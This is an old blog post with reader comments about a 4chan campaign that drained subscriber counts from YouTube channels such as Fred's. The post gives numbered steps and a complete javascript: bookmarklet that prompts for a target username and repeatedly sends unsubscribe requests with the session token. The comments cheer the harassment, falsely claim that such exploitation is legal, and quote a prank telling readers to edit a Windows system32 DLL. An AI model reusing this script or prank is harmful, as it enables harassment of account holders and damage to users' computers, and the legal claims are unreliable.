The Hack o blog
Reinventing the weel
YouTube subscriber glitch Fred and TunderF00T got hacked
Today multiple YouTube accounts got “hacked” it’s still going on the attack was perpetrated by the /B/tards of the ever more infamous 4Chan ” thanks moot”, accounts that were effected includes Fred and TunderF00t ,the problem has not yet been sorted, the YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel, it uses a hole in the JavaScript lack of verification.
I will wright up how this script worked but for now here is the malicious code.
This is how it works, the script in the API usually requires a user to validate the action , the script overrides that and picks a random user to validate and un-subscribes them, the user isn’t in actuality un-subscribed and the counter is mealy decremented.YouTube have had problems in the past with the counters being artificially increased, they haven’t fixed the problem and all they do is recount the subscribers.
DO not do this!!
1 Locate The target channel and subscribe
2 Open multiple page tabs
3 Paste this code into the browsers address bar
javascript:function unsubscribe() { httpreq=new XMLHttpRequest(); httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false); httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC')); if(!httpreq.responseXML) { setTimeout('unsubscribe()', timeout); return; } if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!=' </address> <h2>You have successfully unsubscribed.</h2> ') { alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue); } else if((window.status=++count)!=times) { setTimeout('unsubscribe()', timeout); } else { alert('DUN'); } } count=0; if((username=prompt('enter target\'s username', '\\*username here *\\'))!=null) { if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) { if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) { unsubscribe(); } } } void(0);
Lol pwned.
Pretty sweet but it will get your account perma banned from youtube.
yes it will, it could even leed to police intervention depending on the country you are from
Really? In which country?
Wrong, script exploitation is not against the law, it is up the webmasters to keep their own stuff secure. No law enforcement will be able to punish someone for technically using what could be seen as a feature rather than a hole in security.
It was just bad security by the YouTube developers.
I am not a lawyer. And I realize this is an old article, but someone might come across it and maybe I’m contributing something.
It’s illegal in plenty of US States. I’m from Pennsylvania, and here is a link to the current statute:
http://www.legis.state.pa.us/WU01/LI/LI/CT/HTM/18/00.076.015.000..HTM
In the language of the statute, a judge might rule that this constitutes “alter or erase any computer data, computer programs or computer software;”
It is the subscription count that is altered.
For an interesting discussion on the subject of human law and what might call “computer law,” the laws that computers obey, check out the book “Code and Other Laws of Cyberspace” by Lawrence Lessig.
and yes in some countrys malicious script execution can be illegal in some countrys
Hey guys no it will not make you banned it simply duplicates them
I know the guy who did it and he has been free for 2weeks no we both live in Ireland by the way
peace
who fucking cares about that, really. maybe in police estate eu and us but nowhere else where freedom still exist
Very cool you guys, does this still work? How come others lost subs and some even 500 subs total? Doesn’t make sense or is it because of the youtube boxes?
Yes it still works, but using it will get you beaned permanently form youtube.
No problem, I wasn’t wanting to do that, im a youtube partner so last I would want to use such a code… it stopped though, any idea why? Have the hackers been caught? Also, do they IP ban or usename ban?
All the users caught using this script have had there accounts band, there wont be a fix buy the looks of it they will just recount the subscribers, and wait till the /b/ gets bored
will it ban you ip?
no your account
YEah, HackOblog is right. Don’t do this, you may be beaned…
awesome!!!
check out : youtube.com/watch?v=J82lqgrc-rM
also what’s the one for ADDING subscribers?
Originally it was done in PHP.
Old code as fuck.
Goddamn script kiddies taking the victory in other people’s work.
I’m not sure it was in PHP, but I no what you mean it’s not relay hacking, hacking would involve some effort but what would you expect from /B/
It was PHP, made 2 years ago.
Never fixed. You might find the original hack by putting in site:pastebin.com whatever in google.
It was javascript. don’t assume things when you don’t even know the language.
Sure it is , on the part of the person who discovered this specific glitch . Whether or not it’s the same person as the one who started the attack on Fred , I don’t know . As for everyone else , most were just volunteers . Can’t call them hackers , just fredhaters . Hell , even I used it for a few seconds , didn’t notice anything going on so I closed it
hahahahahahhahaahaahahahahahahahhaha fred deserved it lol n00b
how does this work simply copy and pasting does not work (i only want to try this out on my own channel)
DO NOT DO THIS! Yes…so put it where people CAN do it ._.
it no longer works, well for now and its information the more wide spread a bug is the faster it is fixed, information wants to be free and so on
thumbs up if traveler sent u here.
Pingback: Anonymous Is raiding Fred's youtube, Deleting a huge load of his subscribers.
Err… you misspelled “ThunderF00T”
Who would ever want to hack him lol??
I have misspelled a lot of it, its the H0B moto Bad Spelling lol
Do SxePhil’s dumb azz next!
hack justin beavers next!! how about not!!!
Lol 4chan FTW! 😀
well this happens if great minds think alike 😀
I saw this on /b/:
“Hey newfags, I bet you didn’t know that you could get rid of those annoying captchas did you?
Well I’m feeling generous today and I thought i’d help you out and give some protips.
To remove captchas simply. (Sorry Windows only, macs are gay anyway)
1. Open My Computer.
2. Click C: drive, then open WINDOWS folder.
3. Find system32, DO NOT DELETE THIS FOLDER.
4. Open system32, and find a file called capesnpn.dll.
5. Click open with and choose notepad (Make sure
you click always open with this program)
6. Hit ctrl+F and find the code 0000a1b34 and delete it.
7. Save the file and voila! no more captchas!
This works because the captcha is stored on your PC, and doesn’t work anymore if you delete that code!
TL ; DR – Get rid of captcha, read steps 1-7”
is this true? is safe? or is a scam?
no its not true, don’t do it,
no. it will mess up your computer.
I’m sorry, but whats a /B/tard?
basicley its the name given to the users of the /b/ bored of 4chan
WHAT IS THE HACKERS UTUBE ACCOUNT SO I KNOW WHO NOT TO SUB\
AND WHAT KIND OF VIDEOS ARE THERE
Pingback: YouTube got hacked
Pingback: TechieGeeky.com – Tech news and reviews » Blog Archive » Fred can haz 1337 h4x?
Uh…I don’t know what /B/ is. But, it wasn’t 4Chan, it was EBaums. 4Chan is a nice, family-friendly site.
“4chan is a nice, family-friendly site*
fail…
lol. 4chan and family-friendly do not belong in the same sentence. give the site a peek if you want to know what I mean.
clever bastards
Pingback: An Internet Marketer Can Get Targeted Traffic Free, With Ezines! | Dan's Internet Marketing Business Blog!
Pingback: Top Posts — WordPress.com
I think its funny, because people like me who have no subs could sit back and laugh as the fags cry and wonder why their subs where going down. I also love how people say it was Ebaums, or whatever. Those newfags couldn’t do shit like this.
Now a technical question, instead of all this… Why is the ‘username’ variable undefined?
As in: edit_subscription=newsub&username=’+username+’&subscription_level=unsubscribe’, false);
i will attempt to answer technical questions in an up coming post , de feel free to email me any you have
The script prompts the user for the username before calling the unsubscribe function.
They did it for the LULZ
Wow the guys who did that was completely stupid.
well if they hacked FRED …… then its fine by me !
4chan fails at life and everything else they do! Fred is aright but he gets annoying and isn’t it called harassment or something like that?
Very interesting, i think it is very important to know that. Don’t hesitate to share it again, i think it is so useful to know.
The script in the API? That makes no sense.
We are anonymous.
We are Legion.
United as ONE.
Divided by zero.
We do not forgive Censorship.
We do not forget Oppression.
US SENATE…
Expect us!!
I will take your united 1, and divide it by 0. 0000000000000000000000000000000000000000000000000000000000000
Well they were smart to find this and all. 4chan has some pretty smart guys on it.